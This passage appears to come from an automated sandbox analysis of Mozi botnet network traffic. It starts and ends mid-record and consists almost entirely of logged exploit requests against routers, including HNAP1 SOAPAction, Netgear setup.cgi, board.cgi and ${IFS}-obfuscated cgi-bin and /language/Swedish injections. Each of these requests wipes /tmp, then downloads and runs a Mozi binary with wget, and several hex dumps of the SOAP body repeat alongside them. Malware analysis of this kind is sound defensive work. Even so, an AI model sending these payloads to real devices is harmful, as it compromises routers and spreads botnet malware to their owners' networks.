xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 49.44.132.19:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 104.124.230.135:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 179.40.62.87:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 204.232.228.51:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 45.148.37.237:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 123.110.194.55:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 154.3.84.96:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 185.36.171.129:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 